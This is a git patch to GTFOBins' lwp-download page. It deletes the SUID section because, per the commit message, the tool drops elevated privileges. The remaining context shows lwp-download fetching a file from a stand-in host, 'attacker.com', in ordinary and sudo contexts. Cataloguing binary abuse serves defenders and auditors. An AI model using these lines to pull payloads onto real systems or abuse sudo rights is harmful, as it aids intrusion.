From 313a49d9f783db10a819493c5acd9ac162bee313 Mon Sep 17 00:00:00 2001 From: LinuxSploit <68427058+LinuxSploit@users.noreply.github.com> Date: Fri, 16 Apr 2021 06:36:34 -0400 Subject: [PATCH] Update lwp-download.md lwp-download drop the elevated privileges --- _gtfobins/lwp-download.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/_gtfobins/lwp-download.md b/_gtfobins/lwp-download.md index 1c58a3a..ef37a75 100644 --- a/_gtfobins/lwp-download.md +++ b/_gtfobins/lwp-download.md @@ -6,11 +6,6 @@ functions: URL=http://attacker.com/file_to_get LFILE=file_to_save lwp-download $URL $LFILE - suid: - - code: | - URL=http://attacker.com/file_to_get - LFILE=file_to_save - ./lwp-download $URL $LFILE sudo: - code: | URL=http://attacker.com/file_to_get